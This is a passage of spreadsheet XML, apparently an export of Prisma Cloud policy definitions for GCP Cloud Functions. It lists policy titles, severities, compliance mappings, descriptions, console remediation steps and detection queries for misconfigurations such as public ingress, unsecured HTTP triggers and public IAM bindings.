          <t>GCP Cloud Function configured with overly permissive Ingress setting</t>
        </is>
      </c>
      <c r="L2690" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2690" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2690" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2690" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2690" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2690" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2690" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2690" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2690" t="b">
        <v>0</v>
      </c>
      <c r="U2690" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2690" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2690" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are configured with overly permissive Ingress setting. With overly permissive Ingress setting, all inbound requests to the function are allowed, from both the public and resources within the same project. It is recommended to restrict the traffic from the public and other resources, to get better network-based access control and allow traffic from VPC networks in the same project or traffic through the Cloud Load Balancer.</t>
        </is>
      </c>
      <c r="X2690" t="inlineStr">
        <is>
          <t>1. Login to GCP console
2. Navigate to 'Cloud Functions' service (Left Panel)
3. Click on the alerting function
4. Click on 'EDIT'
5. Click on 'Runtime, build, connections and security settings' drop-down to get the detailed view
6. Click on the 'CONNECTIONS' tab
7. In 'Ingress settings', select either 'Allow internal traffic only' or 'Allow internal traffic and traffic from Cloud Load Balancing'
8. Click on 'NEXT'
9. Click on 'DEPLOY' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-google-cloud-124
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-google-cloud-124</t>
        </is>
      </c>
      <c r="Y2690" t="inlineStr"/>
      <c r="Z2690" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function' AND json.rule = status equals ACTIVE and ingressSettings equals ALLOW_ALL
{"category":"Networking","resourceTypes":["google_cloudfunctions_function","google_cloudfunctions2_function"]}</t>
        </is>
      </c>
      <c r="AA2690" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2690" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2690" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-777-CKV_GCP_124</t>
        </is>
      </c>
      <c r="AD2690" t="b">
        <v>1</v>
      </c>
      <c r="AE2690" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2690" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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90" t="inlineStr">
        <is>
          <t>02b159ed-59df-4924-8b96-868ea6eacf93</t>
        </is>
      </c>
      <c r="AI2690" t="inlineStr">
        <is>
          <t>505e6598-f26b-4054-9f9b-62702126622f</t>
        </is>
      </c>
      <c r="AJ2690" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2690" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2691">
      <c r="A2691" t="inlineStr"/>
      <c r="B2691" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2691" s="2" t="inlineStr"/>
      <c r="D2691" t="inlineStr"/>
      <c r="E2691" t="inlineStr"/>
      <c r="F2691" t="inlineStr"/>
      <c r="G2691" t="b">
        <v>1</v>
      </c>
      <c r="H26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91" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2691" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2691" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable GCP Cloud Function [Java Spring Framework, CVE-2021-22119]</t>
        </is>
      </c>
      <c r="L2691" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2691" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2691" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2691" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2691" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2691" t="inlineStr"/>
      <c r="R2691" t="inlineStr"/>
      <c r="S2691" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2691" t="b">
        <v>0</v>
      </c>
      <c r="U2691" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2691" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2691" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly exposed and have a known exploitable denial of service vulnerability [Java Spring Framework, CVE-2021-22119].
Denial of service vulnerability is a security flaw that allows a user to make a machine or network resource unavailable. Exploiting this vulnerability affects the availability of resources. The fact that the GCP Cloud Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java Spring Framework [CVE-2021-22119] vulnerability and public exposure reported for the GCP Cloud Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2691"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2691" t="inlineStr"/>
      <c r="Z2691" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE id IN ('CVE-2021-22119'))</t>
        </is>
      </c>
      <c r="AA2691" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2691" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:04</t>
        </is>
      </c>
      <c r="AC2691" t="inlineStr"/>
      <c r="AD2691" t="b">
        <v>1</v>
      </c>
      <c r="AE2691" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2691" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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91" t="inlineStr">
        <is>
          <t>bfacd7eb-4761-4d23-8aaa-286d36936772</t>
        </is>
      </c>
      <c r="AI2691" t="inlineStr">
        <is>
          <t>d997c7b5-cdc0-4e50-bb7b-472200f82972</t>
        </is>
      </c>
      <c r="AJ2691" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2691" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2692">
      <c r="A2692" t="inlineStr"/>
      <c r="B2692" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2692" s="2" t="inlineStr"/>
      <c r="D2692" t="inlineStr"/>
      <c r="E2692" t="inlineStr"/>
      <c r="F2692" t="inlineStr"/>
      <c r="G2692" t="b">
        <v>1</v>
      </c>
      <c r="H26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92" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2692" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2692" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable GCP Cloud Function [Java Spring Framework, CVE-2021-22118]</t>
        </is>
      </c>
      <c r="L2692" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2692" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2692" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2692" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2692" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2692" t="inlineStr"/>
      <c r="R2692" t="inlineStr"/>
      <c r="S2692" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2692" t="b">
        <v>0</v>
      </c>
      <c r="U2692" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2692" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2692" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly exposed and have a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GCP Cloud Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java Spring Framework [CVE-2021-22118] vulnerability and public exposure reported for the GCP Cloud Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2692"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2692" t="inlineStr"/>
      <c r="Z2692" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE id IN ('CVE-2021-22118'))</t>
        </is>
      </c>
      <c r="AA2692" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2692" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:04</t>
        </is>
      </c>
      <c r="AC2692" t="inlineStr"/>
      <c r="AD2692" t="b">
        <v>1</v>
      </c>
      <c r="AE2692" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2692" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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92" t="inlineStr">
        <is>
          <t>23c098d3-82da-462e-81d3-f90d1f787f7b</t>
        </is>
      </c>
      <c r="AI2692" t="inlineStr">
        <is>
          <t>6e5992aa-bb29-4b25-98cc-b5c1b8f7139b</t>
        </is>
      </c>
      <c r="AJ2692" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2692" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2693">
      <c r="A2693" t="inlineStr"/>
      <c r="B2693" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2693" s="2" t="inlineStr"/>
      <c r="D2693" t="inlineStr"/>
      <c r="E2693" t="inlineStr"/>
      <c r="F2693" t="inlineStr"/>
      <c r="G2693" t="b">
        <v>1</v>
      </c>
      <c r="H26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693" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2693" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2693" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to a publicly exposed and vulnerable GCP Cloud Function</t>
        </is>
      </c>
      <c r="L2693" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2693" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2693" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2693" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2693" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2693" t="inlineStr"/>
      <c r="R2693" t="inlineStr"/>
      <c r="S2693" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2693" t="b">
        <v>0</v>
      </c>
      <c r="U2693" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2693" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2693" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions which are publicly exposed and have critical or high vulnerabilities.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected Cloud Functions, enabling them to perform malicious actions. The public exposure of these vulnerable Cloud Functions makes them an easy target for attacks.
Immediate attention is required to remediate the critical and high vulnerabilities, and restrict public exposure reported for the Cloud Functions as soon as possible.</t>
        </is>
      </c>
      <c r="X2693" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
It is recommended to review and add appropriate, but restrictive roles before revoking access.
To revoke access from 'allusers'/'allAuthenticatedUsers', follow the below mentioned steps:
1. Login to GCP console
2. Navigate to service 'Cloud Functions'
3. Click on the function on which the alert is generated
4. Go to tab 'PERMISSIONS'
5. Review the roles to see if 'allusers'/'allAuthenticatedUsers' is present
6. Click on the delete icon to revoke access from 'allusers'/'allAuthenticatedUsers'
7. On Pop-up select the check box to confirm 
8. Click on 'REMOVE'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693" t="inlineStr"/>
      <c r="Z2693" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2693" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2693" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2693" t="inlineStr"/>
      <c r="AD2693" t="b">
        <v>1</v>
      </c>
      <c r="AE2693" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2693" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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693" t="inlineStr">
        <is>
          <t>c0f9e3a8-9780-44f2-a59b-30c4f186392e</t>
        </is>
      </c>
      <c r="AI2693" t="inlineStr">
        <is>
          <t>3df30e5c-fb8c-404e-a455-32ad796905b1</t>
        </is>
      </c>
      <c r="AJ2693" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2693" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2694">
      <c r="A2694" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2694" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2694" s="2" t="inlineStr"/>
      <c r="D2694" t="inlineStr"/>
      <c r="E2694" t="inlineStr"/>
      <c r="F2694" t="inlineStr"/>
      <c r="G2694" t="b">
        <v>1</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2694" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2694" t="inlineStr">
        <is>
          <t>GCP Cloud Function with overly permissive network ingress settings</t>
        </is>
      </c>
      <c r="L2694" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2694" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2694" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2694" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2694" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2694" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R2694" t="inlineStr">
        <is>
          <t>CM-07-00 : Least Functionality</t>
        </is>
      </c>
      <c r="S2694" t="inlineStr"/>
      <c r="T2694" t="b">
        <v>0</v>
      </c>
      <c r="U2694" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2694" t="inlineStr">
        <is>
          <t>gcloud-cloud-function-v2</t>
        </is>
      </c>
      <c r="W2694" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that have overly permissive network ingress settings. This includes both Cloud Functions v1 and Cloud Functions v2.
Ingress settings control whether resources outside of your Google Cloud project or VPC Service Controls perimeter can invoke a function.  With overly permissive ingress setting, all inbound requests to invoke function are allowed, both from the public and from resources within the same project. Restrictive network ingress settings for cloud functions in GCP minimize the risk of unauthorized access and attacks by limiting inbound traffic to trusted sources. This approach enhances security, prevents malicious activities, and ensures only legitimate traffic reaches your applications.
It is recommended to restrict the public traffic and allow traffic from VPC networks in the same project or traffic through the Cloud Load Balancer.</t>
        </is>
      </c>
      <c r="X2694" t="inlineStr">
        <is>
          <t>1. Login to GCP console
2. Navigate to 'Cloud Functions' service
3. Click on the alerting function
4. Click on 'EDIT'
5. Click on 'Runtime, build, connections and security settings' drop-down to get the detailed view
6. Click on the 'CONNECTIONS' tab
7. In 'Ingress settings', select either 'Allow internal traffic only' or 'Allow internal traffic and traffic from Cloud Load Balancing'
8. Click on 'NEXT'
9. Click on 'DEPLOY'</t>
        </is>
      </c>
      <c r="Y2694" t="inlineStr"/>
      <c r="Z2694" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function-v2' AND json.rule = state equals ACTIVE and serviceConfig.ingressSettings equals ALLOW_ALL</t>
        </is>
      </c>
      <c r="AA2694" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2694" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2694" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-1250</t>
        </is>
      </c>
      <c r="AD2694" t="b">
        <v>1</v>
      </c>
      <c r="AE2694" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2694" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>1871c476-bbb5-42cc-ab59-6d8c1c130422</t>
        </is>
      </c>
      <c r="AI2694" t="inlineStr">
        <is>
          <t>79332d39-fe6b-4980-8580-4101ce1ff4d5</t>
        </is>
      </c>
      <c r="AJ2694" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2694" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2695">
      <c r="A2695" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, ITSG-33, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2695" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2695" s="2" t="inlineStr"/>
      <c r="D2695" t="n">
        <v>0</v>
      </c>
      <c r="E2695" t="n">
        <v>11</v>
      </c>
      <c r="F2695" t="n">
        <v>0</v>
      </c>
      <c r="G2695" t="b">
        <v>1</v>
      </c>
      <c r="H26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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2695" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2695" t="inlineStr">
        <is>
          <t>GCP Cloud Function v1 is using unsecured HTTP trigger</t>
        </is>
      </c>
      <c r="L2695" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2695" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2695" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2695" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2695" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2695" t="inlineStr">
        <is>
          <t>RA</t>
        </is>
      </c>
      <c r="R2695" t="inlineStr">
        <is>
          <t>RA-05-00 : Vulnerability Monitoring and Scanning</t>
        </is>
      </c>
      <c r="S2695" t="inlineStr"/>
      <c r="T2695" t="b">
        <v>0</v>
      </c>
      <c r="U2695" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2695" t="inlineStr">
        <is>
          <t>gcloud-cloud-function-v2</t>
        </is>
      </c>
      <c r="W2695" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions v1 that are using unsecured HTTP trigger.
Using HTTP triggers for cloud functions poses significant security risks, including vulnerability to interception, tampering, and various attacks like man-in-the-middle. Conversely, HTTPS triggers provide encrypted communication, safeguarding sensitive data and ensuring confidentiality. HTTPS also supports authentication mechanisms, enhancing overall security and trust.
It is recommended to enable 'Require HTTPS' for HTTP triggers for all cloud functions v1.</t>
        </is>
      </c>
      <c r="X2695" t="inlineStr">
        <is>
          <t>1. Login to GCP console
2. Navigate to 'Cloud Functions' service
3. Click on the alerting function
4. Click on 'EDIT'
5. Under section 'Trigger', click on 'EDIT' for HTTP trigger
6. Select the checkbox against the field 'Require HTTPS'
7. Click on 'SAVE'
8. Click on 'NEXT'
9. Click on 'DEPLOY'</t>
        </is>
      </c>
      <c r="Y2695" t="inlineStr"/>
      <c r="Z2695" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function-v2' AND json.rule = state equals "ACTIVE" AND environment equals "GEN_1" AND serviceConfig.securityLevel exists AND serviceConfig.securityLevel does not equal "SECURE_ALWAYS"</t>
        </is>
      </c>
      <c r="AA2695" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2695" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2695" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-1249</t>
        </is>
      </c>
      <c r="AD2695" t="b">
        <v>1</v>
      </c>
      <c r="AE2695" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2695" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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5" t="inlineStr">
        <is>
          <t>7b3f1bcd-04e2-4122-a734-fc906f55e220</t>
        </is>
      </c>
      <c r="AI2695" t="inlineStr">
        <is>
          <t>2c9d0cf9-0e73-4715-b483-cbb94238f1a1</t>
        </is>
      </c>
      <c r="AJ2695" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2695" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2696">
      <c r="A2696" t="inlineStr">
        <is>
          <t>NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, ITSG-33, TX-RAMP Level 2, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, ITSG-33, NYDFS 23 CRR-NY 500.0, ITSG-33, TX-RAMP Level 2, TX-RAMP Level 2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2696" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2696" s="2" t="inlineStr"/>
      <c r="D2696" t="inlineStr"/>
      <c r="E2696" t="inlineStr"/>
      <c r="F2696" t="inlineStr"/>
      <c r="G2696" t="b">
        <v>1</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2696" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2696" t="inlineStr">
        <is>
          <t>GCP Cloud Function is publicly accessible by allUsers or allAuthenticatedUsers</t>
        </is>
      </c>
      <c r="L2696" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2696" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2696" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2696" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2696" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2696" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2696" t="inlineStr">
        <is>
          <t>Access Enforcement</t>
        </is>
      </c>
      <c r="S2696" t="inlineStr"/>
      <c r="T2696" t="b">
        <v>0</v>
      </c>
      <c r="U2696" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2696" t="inlineStr">
        <is>
          <t>gcloud-cloud-function-v2</t>
        </is>
      </c>
      <c r="W2696" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly accessible by allUsers or allAuthenticatedUsers. This includes both Cloud Functions v1 and Cloud Functions v2.
Granting permissions to 'allusers' or 'allAuthenticatedUsers' on any resource in GCP makes the resource public. Public access over cloud functions can lead to unauthorized invocations of the function or leakage of sensitive information such as the function's source code. 
Following the least privileged access policy, it is recommended to grant access restrictively and avoid granting permissions to allUsers or allAuthenticatedUsers unless absolutely needed.</t>
        </is>
      </c>
      <c r="X2696" t="inlineStr">
        <is>
          <t>It is recommended to review and add appropriate, but restrictive roles before revoking access.
To revoke access from 'allusers'/'allAuthenticatedUsers', follow the below mentioned steps:
1. Login to the GCP console
2. Navigate to service 'Cloud Functions'
4. Select the required cloud function
5. Click on 'PERMISSIONS' button
6. Filter for 'allUsers'
7. Click on the 'Remove principal' button (bin icon)
8. Select 'Remove allUsers from all roles on this resource. They may still have access via inherited roles.'
9. Click 'Remove'
10. Repeat steps 6-9 for 'allAuthenticatedUsers'</t>
        </is>
      </c>
      <c r="Y2696" t="inlineStr"/>
      <c r="Z2696" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function-v2' AND json.rule = state equals ACTIVE and iamPolicy.bindings[?any(members[*] is member of ("allAuthenticatedUsers","allUsers"))] exists</t>
        </is>
      </c>
      <c r="AA2696" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2696" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2696" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-1248</t>
        </is>
      </c>
      <c r="AD2696" t="b">
        <v>1</v>
      </c>
      <c r="AE2696" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2696" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>a2cd9b75-6749-4291-9564-ab90561ac58a</t>
        </is>
      </c>
      <c r="AI2696" t="inlineStr">
        <is>
          <t>3e3d770f-fe77-482b-86a4-a41ef2764bb1</t>
        </is>
      </c>
      <c r="AJ2696" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2696" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2697">
      <c r="A2697" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2697" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2697" s="2" t="inlineStr"/>
      <c r="D2697" t="inlineStr"/>
      <c r="E2697" t="inlineStr"/>
      <c r="F2697" t="inlineStr"/>
      <c r="G2697" t="b">
        <v>1</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2697" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2697" t="inlineStr">
        <is>
          <t>GCP Cloud Function not enabled with VPC connector for network egress</t>
        </is>
      </c>
      <c r="L2697" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2697" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2697" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2697" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2697" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2697" t="inlineStr">
        <is>
          <t>LT</t>
        </is>
      </c>
      <c r="R2697" t="inlineStr">
        <is>
          <t>LT-4</t>
        </is>
      </c>
      <c r="S2697" t="inlineStr"/>
      <c r="T2697" t="b">
        <v>0</v>
      </c>
      <c r="U2697" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2697" t="inlineStr">
        <is>
          <t>gcloud-cloud-function-v2</t>
        </is>
      </c>
      <c r="W2697" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are not enabled with a VPC connector for network egress. This includes both Cloud Functions v1 and Cloud Functions v2.
Using a VPC connector for network egress in GCP Cloud Functions is crucial to prevent security risks such as data interception and unauthorized access. This practice strengthens security by allowing safe communication with private resources, enhancing traffic monitoring, reducing the risk of data leaks, and ensuring compliance with security policies.
Note: For a Cloud Function to access public traffic using Serverless VPC Connector, Cloud NAT might be needed.
Link: https://cloud.google.com/functions/docs/networking/network-settings#route-egress-to-vpc
It is recommended to configure GCP Cloud Functions with a VPC connector.</t>
        </is>
      </c>
      <c r="X2697" t="inlineStr">
        <is>
          <t>1. Login to GCP console
2. Navigate to 'Cloud Functions' service
3. Click on the alerting function
4. Click on 'EDIT'
5. Click on 'Runtime, build, connections and security settings’ drop-down to get the detailed view
6. Click on the 'CONNECTIONS' tab
